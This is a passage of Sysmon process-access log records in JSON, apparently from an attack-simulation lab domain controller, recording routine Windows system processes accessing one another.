C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.896","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1829,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.896\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.896","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1830,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.896\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.896","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1831,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.896\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.896","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1832,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.896\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-001076950300}\r\nTargetProcessId: 3780\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.896","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-001076950300}","TargetProcessId":"3780","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1833,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.943\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001094C70200}\r\nSourceProcessId: 2916\r\nSourceThreadId: 3312\r\nSourceImage: C:\\Windows\\system32\\DFSRs.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmidcprv.dll+163a4|C:\\Windows\\system32\\wbem\\wmidcprv.dll+166e0|C:\\Windows\\system32\\wbem\\wmidcprv.dll+abad|C:\\Windows\\system32\\wbem\\wmidcprv.dll+b57e|C:\\Windows\\system32\\DFSRs.exe+d839d|C:\\Windows\\system32\\DFSRs.exe+c0dd|C:\\Windows\\system32\\DFSRs.exe+50e1|C:\\Windows\\system32\\DFSRs.exe+72d2|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.943","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001094C70200}","SourceProcessId":"2916","SourceThreadId":"3312","SourceImage":"C:\\Windows\\system32\\DFSRs.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmidcprv.dll+163a4|C:\\Windows\\system32\\wbem\\wmidcprv.dll+166e0|C:\\Windows\\system32\\wbem\\wmidcprv.dll+abad|C:\\Windows\\system32\\wbem\\wmidcprv.dll+b57e|C:\\Windows\\system32\\DFSRs.exe+d839d|C:\\Windows\\system32\\DFSRs.exe+c0dd|C:\\Windows\\system32\\DFSRs.exe+50e1|C:\\Windows\\system32\\DFSRs.exe+72d2|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1834,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.943\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 2024\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001094C70200}\r\nTargetProcessId: 2916\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+5a1b8|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+35a49|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2807f|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+29591|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+292c2|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26165|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.943","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","SourceProcessId":"1140","SourceThreadId":"2024","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001094C70200}","TargetProcessId":"2916","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+5a1b8|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+35a49|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2807f|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+29591|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+292c2|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26165|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1835,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.943\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 2024\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001094C70200}\r\nTargetProcessId: 2916\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2597b|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+283dc|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+281af|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2982c|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+292fb|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26165|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.943","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","SourceProcessId":"1140","SourceThreadId":"2024","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001094C70200}","TargetProcessId":"2916","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2597b|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+283dc|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+281af|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2982c|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+292fb|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26165|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1836,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.943\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 2024\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001094C70200}\r\nTargetProcessId: 2916\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 